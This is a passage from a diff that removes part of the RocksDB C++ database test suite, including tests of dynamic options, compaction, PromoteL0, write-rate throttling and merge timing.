-    ASSERT_EQ(v, values[k]);
-  }
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBTest, DynamicMiscOptions) {
-  // Test max_sequential_skip_in_iterations
-  Options options;
-  options.env = env_;
-  options.create_if_missing = true;
-  options.max_sequential_skip_in_iterations = 16;
-  options.compression = kNoCompression;
-  options.statistics = rocksdb::CreateDBStatistics();
-  DestroyAndReopen(options);
-
-  auto assert_reseek_count = [this, &options](int key_start, int num_reseek) {
-    int key0 = key_start;
-    int key1 = key_start + 1;
-    int key2 = key_start + 2;
-    Random rnd(301);
-    ASSERT_OK(Put(Key(key0), RandomString(&rnd, 8)));
-    for (int i = 0; i < 10; ++i) {
-      ASSERT_OK(Put(Key(key1), RandomString(&rnd, 8)));
-    }
-    ASSERT_OK(Put(Key(key2), RandomString(&rnd, 8)));
-    std::unique_ptr<Iterator> iter(db_->NewIterator(ReadOptions()));
-    iter->Seek(Key(key1));
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(Key(key1)), 0);
-    iter->Next();
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(Key(key2)), 0);
-    ASSERT_EQ(num_reseek,
-              TestGetTickerCount(options, NUMBER_OF_RESEEKS_IN_ITERATION));
-  };
-  // No reseek
-  assert_reseek_count(100, 0);
-
-  ASSERT_OK(dbfull()->SetOptions({{"max_sequential_skip_in_iterations", "4"}}));
-  // Clear memtable and make new option effective
-  dbfull()->TEST_FlushMemTable(true);
-  // Trigger reseek
-  assert_reseek_count(200, 1);
-
-  ASSERT_OK(
-      dbfull()->SetOptions({{"max_sequential_skip_in_iterations", "16"}}));
-  // Clear memtable and make new option effective
-  dbfull()->TEST_FlushMemTable(true);
-  // No reseek
-  assert_reseek_count(300, 1);
-
-  MutableCFOptions mutable_cf_options;
-  CreateAndReopenWithCF({"pikachu"}, options);
-  // Test soft_pending_compaction_bytes_limit,
-  // hard_pending_compaction_bytes_limit
-  ASSERT_OK(dbfull()->SetOptions(
-      handles_[1], {{"soft_pending_compaction_bytes_limit", "200"},
-                    {"hard_pending_compaction_bytes_limit", "300"}}));
-  ASSERT_OK(dbfull()->TEST_GetLatestMutableCFOptions(handles_[1],
-                                                     &mutable_cf_options));
-  ASSERT_EQ(200, mutable_cf_options.soft_pending_compaction_bytes_limit);
-  ASSERT_EQ(300, mutable_cf_options.hard_pending_compaction_bytes_limit);
-  // Test report_bg_io_stats
-  ASSERT_OK(
-      dbfull()->SetOptions(handles_[1], {{"report_bg_io_stats", "true"}}));
-  // sanity check
-  ASSERT_OK(dbfull()->TEST_GetLatestMutableCFOptions(handles_[1],
-                                                     &mutable_cf_options));
-  ASSERT_TRUE(mutable_cf_options.report_bg_io_stats);
-  // Test compression
-  // sanity check
-  ASSERT_OK(dbfull()->SetOptions({{"compression", "kNoCompression"}}));
-  ASSERT_OK(dbfull()->TEST_GetLatestMutableCFOptions(handles_[0],
-                                                     &mutable_cf_options));
-  ASSERT_EQ(CompressionType::kNoCompression, mutable_cf_options.compression);
-  ASSERT_OK(dbfull()->SetOptions({{"compression", "kSnappyCompression"}}));
-  ASSERT_OK(dbfull()->TEST_GetLatestMutableCFOptions(handles_[0],
-                                                     &mutable_cf_options));
-  ASSERT_EQ(CompressionType::kSnappyCompression,
-            mutable_cf_options.compression);
-  // Test paranoid_file_checks already done in db_block_cache_test
-  ASSERT_OK(
-      dbfull()->SetOptions(handles_[1], {{"paranoid_file_checks", "true"}}));
-  ASSERT_OK(dbfull()->TEST_GetLatestMutableCFOptions(handles_[1],
-                                                     &mutable_cf_options));
-  ASSERT_TRUE(mutable_cf_options.report_bg_io_stats);
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBTest, L0L1L2AndUpHitCounter) {
-  Options options = CurrentOptions();
-  options.write_buffer_size = 32 * 1024;
-  options.target_file_size_base = 32 * 1024;
-  options.level0_file_num_compaction_trigger = 2;
-  options.level0_slowdown_writes_trigger = 2;
-  options.level0_stop_writes_trigger = 4;
-  options.max_bytes_for_level_base = 64 * 1024;
-  options.max_write_buffer_number = 2;
-  options.max_background_compactions = 8;
-  options.max_background_flushes = 8;
-  options.statistics = rocksdb::CreateDBStatistics();
-  CreateAndReopenWithCF({"mypikachu"}, options);
-
-  int numkeys = 20000;
-  for (int i = 0; i < numkeys; i++) {
-    ASSERT_OK(Put(1, Key(i), "val"));
-  }
-  ASSERT_EQ(0, TestGetTickerCount(options, GET_HIT_L0));
-  ASSERT_EQ(0, TestGetTickerCount(options, GET_HIT_L1));
-  ASSERT_EQ(0, TestGetTickerCount(options, GET_HIT_L2_AND_UP));
-
-  ASSERT_OK(Flush(1));
-  dbfull()->TEST_WaitForCompact();
-
-  for (int i = 0; i < numkeys; i++) {
-    ASSERT_EQ(Get(1, Key(i)), "val");
-  }
-
-  ASSERT_GT(TestGetTickerCount(options, GET_HIT_L0), 100);
-  ASSERT_GT(TestGetTickerCount(options, GET_HIT_L1), 100);
-  ASSERT_GT(TestGetTickerCount(options, GET_HIT_L2_AND_UP), 100);
-
-  ASSERT_EQ(numkeys, TestGetTickerCount(options, GET_HIT_L0) +
-                         TestGetTickerCount(options, GET_HIT_L1) +
-                         TestGetTickerCount(options, GET_HIT_L2_AND_UP));
-}
-
-TEST_F(DBTest, EncodeDecompressedBlockSizeTest) {
-  // iter 0 -- zlib
-  // iter 1 -- bzip2
-  // iter 2 -- lz4
-  // iter 3 -- lz4HC
-  // iter 4 -- xpress
-  CompressionType compressions[] = {kZlibCompression, kBZip2Compression,
-                                    kLZ4Compression, kLZ4HCCompression,
-                                    kXpressCompression};
-  for (auto comp : compressions) {
-    if (!CompressionTypeSupported(comp)) {
-      continue;
-    }
-    // first_table_version 1 -- generate with table_version == 1, read with
-    // table_version == 2
-    // first_table_version 2 -- generate with table_version == 2, read with
-    // table_version == 1
-    for (int first_table_version = 1; first_table_version <= 2;
-         ++first_table_version) {
-      BlockBasedTableOptions table_options;
-      table_options.format_version = first_table_version;
-      table_options.filter_policy.reset(NewBloomFilterPolicy(10));
-      Options options = CurrentOptions();
-      options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-      options.create_if_missing = true;
-      options.compression = comp;
-      DestroyAndReopen(options);
-
-      int kNumKeysWritten = 100000;
-
-      Random rnd(301);
-      for (int i = 0; i < kNumKeysWritten; ++i) {
-        // compressible string
-        ASSERT_OK(Put(Key(i), RandomString(&rnd, 128) + std::string(128, 'a')));
-      }
-
-      table_options.format_version = first_table_version == 1 ? 2 : 1;
-      options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-      Reopen(options);
-      for (int i = 0; i < kNumKeysWritten; ++i) {
-        auto r = Get(Key(i));
-        ASSERT_EQ(r.substr(128), std::string(128, 'a'));
-      }
-    }
-  }
-}
-
-TEST_F(DBTest, CloseSpeedup) {
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleLevel;
-  options.write_buffer_size = 110 << 10;  // 110KB
-  options.arena_block_size = 4 << 10;
-  options.level0_file_num_compaction_trigger = 2;
-  options.num_levels = 4;
-  options.max_bytes_for_level_base = 400 * 1024;
-  options.max_write_buffer_number = 16;
-
-  // Block background threads
-  env_->SetBackgroundThreads(1, Env::LOW);
-  env_->SetBackgroundThreads(1, Env::HIGH);
-  test::SleepingBackgroundTask sleeping_task_low;
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task_low,
-                 Env::Priority::LOW);
-  test::SleepingBackgroundTask sleeping_task_high;
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask,
-                 &sleeping_task_high, Env::Priority::HIGH);
-
-  std::vector<std::string> filenames;
-  env_->GetChildren(dbname_, &filenames);
-  // Delete archival files.
-  for (size_t i = 0; i < filenames.size(); ++i) {
-    env_->DeleteFile(dbname_ + "/" + filenames[i]);
-  }
-  env_->DeleteDir(dbname_);
-  DestroyAndReopen(options);
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  env_->SetBackgroundThreads(1, Env::LOW);
-  env_->SetBackgroundThreads(1, Env::HIGH);
-  Random rnd(301);
-  int key_idx = 0;
-
-  // First three 110KB files are not going to level 2
-  // After that, (100K, 200K)
-  for (int num = 0; num < 5; num++) {
-    GenerateNewFile(&rnd, &key_idx, true);
-  }
-
-  ASSERT_EQ(0, GetSstFileCount(dbname_));
-
-  Close();
-  ASSERT_EQ(0, GetSstFileCount(dbname_));
-
-  // Unblock background threads
-  sleeping_task_high.WakeUp();
-  sleeping_task_high.WaitUntilDone();
-  sleeping_task_low.WakeUp();
-  sleeping_task_low.WaitUntilDone();
-
-  Destroy(options);
-}
-
-class DelayedMergeOperator : public MergeOperator {
- private:
-  DBTest* db_test_;
-
- public:
-  explicit DelayedMergeOperator(DBTest* d) : db_test_(d) {}
-
-  virtual bool FullMergeV2(const MergeOperationInput& merge_in,
-                           MergeOperationOutput* merge_out) const override {
-    db_test_->env_->addon_time_.fetch_add(1000);
-    merge_out->new_value = "";
-    return true;
-  }
-
-  virtual const char* Name() const override { return "DelayedMergeOperator"; }
-};
-
-TEST_F(DBTest, MergeTestTime) {
-  std::string one, two, three;
-  PutFixed64(&one, 1);
-  PutFixed64(&two, 2);
-  PutFixed64(&three, 3);
-
-  // Enable time profiling
-  SetPerfLevel(kEnableTime);
-  this->env_->addon_time_.store(0);
-  this->env_->time_elapse_only_sleep_ = true;
-  this->env_->no_slowdown_ = true;
-  Options options = CurrentOptions();
-  options.statistics = rocksdb::CreateDBStatistics();
-  options.merge_operator.reset(new DelayedMergeOperator(this));
-  DestroyAndReopen(options);
-
-  ASSERT_EQ(TestGetTickerCount(options, MERGE_OPERATION_TOTAL_TIME), 0);
-  db_->Put(WriteOptions(), "foo", one);
-  ASSERT_OK(Flush());
-  ASSERT_OK(db_->Merge(WriteOptions(), "foo", two));
-  ASSERT_OK(Flush());
-  ASSERT_OK(db_->Merge(WriteOptions(), "foo", three));
-  ASSERT_OK(Flush());
-
-  ReadOptions opt;
-  opt.verify_checksums = true;
-  opt.snapshot = nullptr;
-  std::string result;
-  db_->Get(opt, "foo", &result);
-
-  ASSERT_EQ(1000000, TestGetTickerCount(options, MERGE_OPERATION_TOTAL_TIME));
-
-  ReadOptions read_options;
-  std::unique_ptr<Iterator> iter(db_->NewIterator(read_options));
-  int count = 0;
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-    ASSERT_OK(iter->status());
-    ++count;
-  }
-
-  ASSERT_EQ(1, count);
-  ASSERT_EQ(2000000, TestGetTickerCount(options, MERGE_OPERATION_TOTAL_TIME));
-#ifdef ROCKSDB_USING_THREAD_STATUS
-  ASSERT_GT(TestGetTickerCount(options, FLUSH_WRITE_BYTES), 0);
-#endif  // ROCKSDB_USING_THREAD_STATUS
-  this->env_->time_elapse_only_sleep_ = false;
-}
-
-#ifndef ROCKSDB_LITE
-TEST_P(DBTestWithParam, MergeCompactionTimeTest) {
-  SetPerfLevel(kEnableTime);
-  Options options = CurrentOptions();
-  options.compaction_filter_factory = std::make_shared<KeepFilterFactory>();
-  options.statistics = rocksdb::CreateDBStatistics();
-  options.merge_operator.reset(new DelayedMergeOperator(this));
-  options.compaction_style = kCompactionStyleUniversal;
-  options.max_subcompactions = max_subcompactions_;
-  DestroyAndReopen(options);
-
-  for (int i = 0; i < 1000; i++) {
-    ASSERT_OK(db_->Merge(WriteOptions(), "foo", "TEST"));
-    ASSERT_OK(Flush());
-  }
-  dbfull()->TEST_WaitForFlushMemTable();
-  dbfull()->TEST_WaitForCompact();
-
-  ASSERT_NE(TestGetTickerCount(options, MERGE_OPERATION_TOTAL_TIME), 0);
-}
-
-TEST_P(DBTestWithParam, FilterCompactionTimeTest) {
-  Options options = CurrentOptions();
-  options.compaction_filter_factory =
-      std::make_shared<DelayFilterFactory>(this);
-  options.disable_auto_compactions = true;
-  options.create_if_missing = true;
-  options.statistics = rocksdb::CreateDBStatistics();
-  options.max_subcompactions = max_subcompactions_;
-  DestroyAndReopen(options);
-
-  // put some data
-  for (int table = 0; table < 4; ++table) {
-    for (int i = 0; i < 10 + table; ++i) {
-      Put(ToString(table * 100 + i), "val");
-    }
-    Flush();
-  }
-
-  CompactRangeOptions cro;
-  cro.exclusive_manual_compaction = exclusive_manual_compaction_;
-  ASSERT_OK(db_->CompactRange(cro, nullptr, nullptr));
-  ASSERT_EQ(0U, CountLiveFiles());
-
-  Reopen(options);
-
-  Iterator* itr = db_->NewIterator(ReadOptions());
-  itr->SeekToFirst();
-  ASSERT_NE(TestGetTickerCount(options, FILTER_OPERATION_TOTAL_TIME), 0);
-  delete itr;
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBTest, TestLogCleanup) {
-  Options options = CurrentOptions();
-  options.write_buffer_size = 64 * 1024;  // very small
-  // only two memtables allowed ==> only two log files
-  options.max_write_buffer_number = 2;
-  Reopen(options);
-
-  for (int i = 0; i < 100000; ++i) {
-    Put(Key(i), "val");
-    // only 2 memtables will be alive, so logs_to_free needs to always be below
-    // 2
-    ASSERT_LT(dbfull()->TEST_LogsToFreeSize(), static_cast<size_t>(3));
-  }
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBTest, EmptyCompactedDB) {
-  Options options = CurrentOptions();
-  options.max_open_files = -1;
-  Close();
-  ASSERT_OK(ReadOnlyReopen(options));
-  Status s = Put("new", "value");
-  ASSERT_TRUE(s.IsNotSupported());
-  Close();
-}
-#endif  // ROCKSDB_LITE
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBTest, SuggestCompactRangeTest) {
-  class CompactionFilterFactoryGetContext : public CompactionFilterFactory {
-   public:
-    virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-        const CompactionFilter::Context& context) override {
-      saved_context = context;
-      std::unique_ptr<CompactionFilter> empty_filter;
-      return empty_filter;
-    }
-    const char* Name() const override {
-      return "CompactionFilterFactoryGetContext";
-    }
-    static bool IsManual(CompactionFilterFactory* compaction_filter_factory) {
-      return reinterpret_cast<CompactionFilterFactoryGetContext*>(
-                 compaction_filter_factory)
-          ->saved_context.is_manual_compaction;
-    }
-    CompactionFilter::Context saved_context;
-  };
-
-  Options options = CurrentOptions();
-  options.memtable_factory.reset(
-      new SpecialSkipListFactory(DBTestBase::kNumKeysByGenerateNewRandomFile));
-  options.compaction_style = kCompactionStyleLevel;
-  options.compaction_filter_factory.reset(
-      new CompactionFilterFactoryGetContext());
-  options.write_buffer_size = 200 << 10;
-  options.arena_block_size = 4 << 10;
-  options.level0_file_num_compaction_trigger = 4;
-  options.num_levels = 4;
-  options.compression = kNoCompression;
-  options.max_bytes_for_level_base = 450 << 10;
-  options.target_file_size_base = 98 << 10;
-  options.max_compaction_bytes = static_cast<uint64_t>(1) << 60;  // inf
-
-  Reopen(options);
-
-  Random rnd(301);
-
-  for (int num = 0; num < 3; num++) {
-    GenerateNewRandomFile(&rnd);
-  }
-
-  GenerateNewRandomFile(&rnd);
-  ASSERT_EQ("0,4", FilesPerLevel(0));
-  ASSERT_TRUE(!CompactionFilterFactoryGetContext::IsManual(
-      options.compaction_filter_factory.get()));
-
-  GenerateNewRandomFile(&rnd);
-  ASSERT_EQ("1,4", FilesPerLevel(0));
-
-  GenerateNewRandomFile(&rnd);
-  ASSERT_EQ("2,4", FilesPerLevel(0));
-
-  GenerateNewRandomFile(&rnd);
-  ASSERT_EQ("3,4", FilesPerLevel(0));
-
-  GenerateNewRandomFile(&rnd);
-  ASSERT_EQ("0,4,4", FilesPerLevel(0));
-
-  GenerateNewRandomFile(&rnd);
-  ASSERT_EQ("1,4,4", FilesPerLevel(0));
-
-  GenerateNewRandomFile(&rnd);
-  ASSERT_EQ("2,4,4", FilesPerLevel(0));
-
-  GenerateNewRandomFile(&rnd);
-  ASSERT_EQ("3,4,4", FilesPerLevel(0));
-
-  GenerateNewRandomFile(&rnd);
-  ASSERT_EQ("0,4,8", FilesPerLevel(0));
-
-  GenerateNewRandomFile(&rnd);
-  ASSERT_EQ("1,4,8", FilesPerLevel(0));
-
-  // compact it three times
-  for (int i = 0; i < 3; ++i) {
-    ASSERT_OK(experimental::SuggestCompactRange(db_, nullptr, nullptr));
-    dbfull()->TEST_WaitForCompact();
-  }
-
-  // All files are compacted
-  ASSERT_EQ(0, NumTableFilesAtLevel(0));
-  ASSERT_EQ(0, NumTableFilesAtLevel(1));
-
-  GenerateNewRandomFile(&rnd);
-  ASSERT_EQ(1, NumTableFilesAtLevel(0));
-
-  // nonoverlapping with the file on level 0
-  Slice start("a"), end("b");
-  ASSERT_OK(experimental::SuggestCompactRange(db_, &start, &end));
-  dbfull()->TEST_WaitForCompact();
-
-  // should not compact the level 0 file
-  ASSERT_EQ(1, NumTableFilesAtLevel(0));
-
-  start = Slice("j");
-  end = Slice("m");
-  ASSERT_OK(experimental::SuggestCompactRange(db_, &start, &end));
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_TRUE(CompactionFilterFactoryGetContext::IsManual(
-      options.compaction_filter_factory.get()));
-
-  // now it should compact the level 0 file
-  ASSERT_EQ(0, NumTableFilesAtLevel(0));
-  ASSERT_EQ(1, NumTableFilesAtLevel(1));
-}
-
-TEST_F(DBTest, PromoteL0) {
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = true;
-  options.write_buffer_size = 10 * 1024 * 1024;
-  DestroyAndReopen(options);
-
-  // non overlapping ranges
-  std::vector<std::pair<int32_t, int32_t>> ranges = {
-      {81, 160}, {0, 80}, {161, 240}, {241, 320}};
-
-  int32_t value_size = 10 * 1024;  // 10 KB
-
-  Random rnd(301);
-  std::map<int32_t, std::string> values;
-  for (const auto& range : ranges) {
-    for (int32_t j = range.first; j < range.second; j++) {
-      values[j] = RandomString(&rnd, value_size);
-      ASSERT_OK(Put(Key(j), values[j]));
-    }
-    ASSERT_OK(Flush());
-  }
-
-  int32_t level0_files = NumTableFilesAtLevel(0, 0);
-  ASSERT_EQ(level0_files, ranges.size());
-  ASSERT_EQ(NumTableFilesAtLevel(1, 0), 0);  // No files in L1
-
-  // Promote L0 level to L2.
-  ASSERT_OK(experimental::PromoteL0(db_, db_->DefaultColumnFamily(), 2));
-  // We expect that all the files were trivially moved from L0 to L2
-  ASSERT_EQ(NumTableFilesAtLevel(0, 0), 0);
-  ASSERT_EQ(NumTableFilesAtLevel(2, 0), level0_files);
-
-  for (const auto& kv : values) {
-    ASSERT_EQ(Get(Key(kv.first)), kv.second);
-  }
-}
-
-TEST_F(DBTest, PromoteL0Failure) {
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = true;
-  options.write_buffer_size = 10 * 1024 * 1024;
-  DestroyAndReopen(options);
-
-  // Produce two L0 files with overlapping ranges.
-  ASSERT_OK(Put(Key(0), ""));
-  ASSERT_OK(Put(Key(3), ""));
-  ASSERT_OK(Flush());
-  ASSERT_OK(Put(Key(1), ""));
-  ASSERT_OK(Flush());
-
-  Status status;
-  // Fails because L0 has overlapping files.
-  status = experimental::PromoteL0(db_, db_->DefaultColumnFamily());
-  ASSERT_TRUE(status.IsInvalidArgument());
-
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  // Now there is a file in L1.
-  ASSERT_GE(NumTableFilesAtLevel(1, 0), 1);
-
-  ASSERT_OK(Put(Key(5), ""));
-  ASSERT_OK(Flush());
-  // Fails because L1 is non-empty.
-  status = experimental::PromoteL0(db_, db_->DefaultColumnFamily());
-  ASSERT_TRUE(status.IsInvalidArgument());
-}
-#endif  // ROCKSDB_LITE
-
-// Github issue #596
-TEST_F(DBTest, HugeNumberOfLevels) {
-  Options options = CurrentOptions();
-  options.write_buffer_size = 2 * 1024 * 1024;         // 2MB
-  options.max_bytes_for_level_base = 2 * 1024 * 1024;  // 2MB
-  options.num_levels = 12;
-  options.max_background_compactions = 10;
-  options.max_bytes_for_level_multiplier = 2;
-  options.level_compaction_dynamic_level_bytes = true;
-  DestroyAndReopen(options);
-
-  Random rnd(301);
-  for (int i = 0; i < 300000; ++i) {
-    ASSERT_OK(Put(Key(i), RandomString(&rnd, 1024)));
-  }
-
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-}
-
-TEST_F(DBTest, AutomaticConflictsWithManualCompaction) {
-  Options options = CurrentOptions();
-  options.write_buffer_size = 2 * 1024 * 1024;         // 2MB
-  options.max_bytes_for_level_base = 2 * 1024 * 1024;  // 2MB
-  options.num_levels = 12;
-  options.max_background_compactions = 10;
-  options.max_bytes_for_level_multiplier = 2;
-  options.level_compaction_dynamic_level_bytes = true;
-  DestroyAndReopen(options);
-
-  Random rnd(301);
-  for (int i = 0; i < 300000; ++i) {
-    ASSERT_OK(Put(Key(i), RandomString(&rnd, 1024)));
-  }
-
-  std::atomic<int> callback_count(0);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction()::Conflict",
-      [&](void* arg) { callback_count.fetch_add(1); });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  CompactRangeOptions croptions;
-  croptions.exclusive_manual_compaction = false;
-  ASSERT_OK(db_->CompactRange(croptions, nullptr, nullptr));
-  ASSERT_GE(callback_count.load(), 1);
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  for (int i = 0; i < 300000; ++i) {
-    ASSERT_NE("NOT_FOUND", Get(Key(i)));
-  }
-}
-
-// Github issue #595
-// Large write batch with column families
-TEST_F(DBTest, LargeBatchWithColumnFamilies) {
-  Options options = CurrentOptions();
-  options.env = env_;
-  options.write_buffer_size = 100000;  // Small write buffer
-  CreateAndReopenWithCF({"pikachu"}, options);
-  int64_t j = 0;
-  for (int i = 0; i < 5; i++) {
-    for (int pass = 1; pass <= 3; pass++) {
-      WriteBatch batch;
-      size_t write_size = 1024 * 1024 * (5 + i);
-      fprintf(stderr, "prepare: %" ROCKSDB_PRIszt " MB, pass:%d\n",
-              (write_size / 1024 / 1024), pass);
-      for (;;) {
-        std::string data(3000, j++ % 127 + 20);
-        data += ToString(j);
-        batch.Put(handles_[0], Slice(data), Slice(data));
-        if (batch.GetDataSize() > write_size) {
-          break;
-        }
-      }
-      fprintf(stderr, "write: %" ROCKSDB_PRIszt " MB\n",
-              (batch.GetDataSize() / 1024 / 1024));
-      ASSERT_OK(dbfull()->Write(WriteOptions(), &batch));
-      fprintf(stderr, "done\n");
-    }
-  }
-  // make sure we can re-open it.
-  ASSERT_OK(TryReopenWithColumnFamilies({"default", "pikachu"}, options));
-}
-
-// Make sure that Flushes can proceed in parallel with CompactRange()
-TEST_F(DBTest, FlushesInParallelWithCompactRange) {
-  // iter == 0 -- leveled
-  // iter == 1 -- leveled, but throw in a flush between two levels compacting
-  // iter == 2 -- universal
-  for (int iter = 0; iter < 3; ++iter) {
-    Options options = CurrentOptions();
-    if (iter < 2) {
-      options.compaction_style = kCompactionStyleLevel;
-    } else {
-      options.compaction_style = kCompactionStyleUniversal;
-    }
-    options.write_buffer_size = 110 << 10;
-    options.level0_file_num_compaction_trigger = 4;
-    options.num_levels = 4;
-    options.compression = kNoCompression;
-    options.max_bytes_for_level_base = 450 << 10;
-    options.target_file_size_base = 98 << 10;
-    options.max_write_buffer_number = 2;
-
-    DestroyAndReopen(options);
-
-    Random rnd(301);
-    for (int num = 0; num < 14; num++) {
-      GenerateNewRandomFile(&rnd);
-    }
-
-    if (iter == 1) {
-      rocksdb::SyncPoint::GetInstance()->LoadDependency(
-          {{"DBImpl::RunManualCompaction()::1",
-            "DBTest::FlushesInParallelWithCompactRange:1"},
-           {"DBTest::FlushesInParallelWithCompactRange:2",
-            "DBImpl::RunManualCompaction()::2"}});
-    } else {
-      rocksdb::SyncPoint::GetInstance()->LoadDependency(
-          {{"CompactionJob::Run():Start",
-            "DBTest::FlushesInParallelWithCompactRange:1"},
-           {"DBTest::FlushesInParallelWithCompactRange:2",
-            "CompactionJob::Run():End"}});
-    }
-    rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-    std::vector<port::Thread> threads;
-    threads.emplace_back([&]() { Compact("a", "z"); });
-
-    TEST_SYNC_POINT("DBTest::FlushesInParallelWithCompactRange:1");
-
-    // this has to start a flush. if flushes are blocked, this will try to
-    // create
-    // 3 memtables, and that will fail because max_write_buffer_number is 2
-    for (int num = 0; num < 3; num++) {
-      GenerateNewRandomFile(&rnd, /* nowait */ true);
-    }
-
-    TEST_SYNC_POINT("DBTest::FlushesInParallelWithCompactRange:2");
-
-    for (auto& t : threads) {
-      t.join();
-    }
-    rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  }
-}
-
-TEST_F(DBTest, DelayedWriteRate) {
-  const int kEntriesPerMemTable = 100;
-  const int kTotalFlushes = 12;
-
-  Options options = CurrentOptions();
-  env_->SetBackgroundThreads(1, Env::LOW);
-  options.env = env_;
-  env_->no_slowdown_ = true;
-  options.write_buffer_size = 100000000;
-  options.max_write_buffer_number = 256;
-  options.max_background_compactions = 1;
-  options.level0_file_num_compaction_trigger = 3;
-  options.level0_slowdown_writes_trigger = 3;
-  options.level0_stop_writes_trigger = 999999;
-  options.delayed_write_rate = 20000000;  // Start with 200MB/s
-  options.memtable_factory.reset(
-      new SpecialSkipListFactory(kEntriesPerMemTable));
-
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  // Block compactions
-  test::SleepingBackgroundTask sleeping_task_low;
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task_low,
-                 Env::Priority::LOW);
-
-  for (int i = 0; i < 3; i++) {
-    Put(Key(i), std::string(10000, 'x'));
-    Flush();
-  }
-
-  // These writes will be slowed down to 1KB/s
-  uint64_t estimated_sleep_time = 0;
-  Random rnd(301);
-  Put("", "");
-  uint64_t cur_rate = options.delayed_write_rate;
-  for (int i = 0; i < kTotalFlushes; i++) {
-    uint64_t size_memtable = 0;
-    for (int j = 0; j < kEntriesPerMemTable; j++) {
-      auto rand_num = rnd.Uniform(20);
-      // Spread the size range to more.
-      size_t entry_size = rand_num * rand_num * rand_num;
-      WriteOptions wo;
-      Put(Key(i), std::string(entry_size, 'x'), wo);
-      size_memtable += entry_size + 18;
-      // Occasionally sleep a while
-      if (rnd.Uniform(20) == 6) {
-        env_->SleepForMicroseconds(2666);
-      }
-    }
-    dbfull()->TEST_WaitForFlushMemTable();
-    estimated_sleep_time += size_memtable * 1000000u / cur_rate;
-    // Slow down twice. One for memtable switch and one for flush finishes.
-    cur_rate = static_cast<uint64_t>(static_cast<double>(cur_rate) *
-                                     kIncSlowdownRatio * kIncSlowdownRatio);
-  }
-  // Estimate the total sleep time fall into the rough range.
-  ASSERT_GT(env_->addon_time_.load(),
-            static_cast<int64_t>(estimated_sleep_time / 2));
-  ASSERT_LT(env_->addon_time_.load(),
-            static_cast<int64_t>(estimated_sleep_time * 2));
-
-  env_->no_slowdown_ = false;
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  sleeping_task_low.WakeUp();
-  sleeping_task_low.WaitUntilDone();
-}
-
-TEST_F(DBTest, HardLimit) {
-  Options options = CurrentOptions();
-  options.env = env_;
-  env_->SetBackgroundThreads(1, Env::LOW);
-  options.max_write_buffer_number = 256;
-  options.write_buffer_size = 110 << 10;  // 110KB
-  options.arena_block_size = 4 * 1024;
-  options.level0_file_num_compaction_trigger = 4;
-  options.level0_slowdown_writes_trigger = 999999;
-  options.level0_stop_writes_trigger = 999999;
-  options.hard_pending_compaction_bytes_limit = 800 << 10;
-  options.max_bytes_for_level_base = 10000000000u;
-  options.max_background_compactions = 1;
-  options.memtable_factory.reset(
-      new SpecialSkipListFactory(KNumKeysByGenerateNewFile - 1));
-
-  env_->SetBackgroundThreads(1, Env::LOW);
-  test::SleepingBackgroundTask sleeping_task_low;
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task_low,
-                 Env::Priority::LOW);
-
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  std::atomic<int> callback_count(0);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack("DBImpl::DelayWrite:Wait",
-                                                 [&](void* arg) {
-                                                   callback_count.fetch_add(1);
-                                                   sleeping_task_low.WakeUp();
-                                                 });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Random rnd(301);
-  int key_idx = 0;
-  for (int num = 0; num < 5; num++) {
-    GenerateNewFile(&rnd, &key_idx, true);
-    dbfull()->TEST_WaitForFlushMemTable();
-  }
-
-  ASSERT_EQ(0, callback_count.load());
-
-  for (int num = 0; num < 5; num++) {
-    GenerateNewFile(&rnd, &key_idx, true);
-    dbfull()->TEST_WaitForFlushMemTable();
-  }
-  ASSERT_GE(callback_count.load(), 1);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  sleeping_task_low.WaitUntilDone();
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBTest, SoftLimit) {
-  Options options = CurrentOptions();
-  options.env = env_;
-  options.write_buffer_size = 100000;  // Small write buffer
-  options.max_write_buffer_number = 256;
-  options.level0_file_num_compaction_trigger = 1;
-  options.level0_slowdown_writes_trigger = 3;
-  options.level0_stop_writes_trigger = 999999;
-  options.delayed_write_rate = 20000;  // About 200KB/s limited rate
-  options.soft_pending_compaction_bytes_limit = 160000;
-  options.target_file_size_base = 99999999;  // All into one file
-  options.max_bytes_for_level_base = 50000;
-  options.max_bytes_for_level_multiplier = 10;
-  options.max_background_compactions = 1;
-  options.compression = kNoCompression;
-
-  Reopen(options);
-
-  // Generating 360KB in Level 3
-  for (int i = 0; i < 72; i++) {
-    Put(Key(i), std::string(5000, 'x'));
-    if (i % 10 == 0) {
-      Flush();
-    }
-  }
-  dbfull()->TEST_WaitForCompact();
-  MoveFilesToLevel(3);
-
-  // Generating 360KB in Level 2
